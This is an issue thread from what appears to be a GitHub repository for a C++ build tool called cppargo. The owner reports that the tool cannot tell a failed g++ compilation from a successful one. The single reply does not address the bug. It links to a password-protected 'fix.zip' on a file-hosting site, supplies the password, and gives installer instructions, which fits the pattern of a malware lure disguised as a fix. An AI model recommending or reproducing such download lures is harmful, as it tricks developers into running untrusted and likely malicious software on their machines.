### ISSUE TITLE
Recognize failed compilation

### ISSUE THREAD

**Issue by BassedWarrior** [BassedWarrior/cppargo#2]
Currently, the program cannot distinguish between a successful and an
unsuccessful compilation. Leading to the program displaying successful
compilation when the `g++` compiler says otherwise. Leading to confusion and
to the program attempting to run an out-dated version of the program.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
